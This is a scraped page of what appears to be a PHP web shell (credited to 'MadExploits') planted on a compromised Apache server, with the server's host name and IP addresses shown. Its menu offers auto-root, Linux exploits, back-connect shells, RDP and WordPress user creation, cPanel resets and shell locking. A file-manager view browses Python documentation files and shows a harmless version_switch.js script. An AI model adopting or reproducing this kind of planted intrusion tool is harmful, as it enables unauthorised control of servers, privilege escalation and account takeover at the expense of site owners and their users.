Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 52.15.209.178
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-docs-2.7.5 /
html /
_static /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax-loader.gif
673
B
-rw-r--r--
basic.css
6.77
KB
-rw-r--r--
comment-bright.png
3.42
KB
-rw-r--r--
comment-close.png
3.49
KB
-rw-r--r--
comment.png
3.36
KB
-rw-r--r--
copybutton.js
2.4
KB
-rw-r--r--
default.css
4.03
KB
-rw-r--r--
doctools.js
6.68
KB
-rw-r--r--
down-pressed.png
368
B
-rw-r--r--
down.png
363
B
-rw-r--r--
file.png
392
B
-rw-r--r--
jquery.js
70.48
KB
-rw-r--r--
minus.png
199
B
-rw-r--r--
opensearch.xml
569
B
-rw-r--r--
plus.png
199
B
-rw-r--r--
py.png
695
B
-rw-r--r--
pygments.css
3.84
KB
-rw-r--r--
searchtools.js
15.67
KB
-rw-r--r--
sidebar.js
4.63
KB
-rw-r--r--
underscore.js
8.37
KB
-rw-r--r--
up-pressed.png
372
B
-rw-r--r--
up.png
363
B
-rw-r--r--
version_switch.js
1.76
KB
-rw-r--r--
websupport.js
24.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : version_switch.js
(function() { 'use strict'; var all_versions = { '3.4': 'dev (3.4)', '3.3': '3.3', '3.2': '3.2', '2.7': '2.7', '2.6': '2.6' }; function build_select(current_version, current_release) { var buf = ['<select>']; $.each(all_versions, function(version, title) { buf.push('<option value="' + version + '"'); if (version == current_version) buf.push(' selected="selected">' + current_release + '</option>'); else buf.push('>' + title + '</option>'); }); buf.push('</select>'); return buf.join(''); } function patch_url(url, new_version) { var url_re = /\.org\/(\d|py3k|dev|((release\/)?\d\.\d[\w\d\.]*))\//, new_url = url.replace(url_re, '.org/' + new_version + '/'); if (new_url == url && !new_url.match(url_re)) { // python 2 url without version? new_url = url.replace(/\.org\//, '.org/' + new_version + '/'); } return new_url; } function on_switch() { var selected = $(this).children('option:selected').attr('value'); var url = window.location.href, new_url = patch_url(url, selected); if (new_url != url) { // check beforehand if url exists, else redirect to version's start page $.ajax({ url: new_url, success: function() { window.location.href = new_url; }, error: function() { window.location.href = 'http://docs.python.org/' + selected; } }); } } $(document).ready(function() { var release = DOCUMENTATION_OPTIONS.VERSION; var version = release.substr(0, 3); var select = build_select(version, release); $('.version_switcher_placeholder').html(select); $('.version_switcher_placeholder select').bind('change', on_switch); }); })();
Close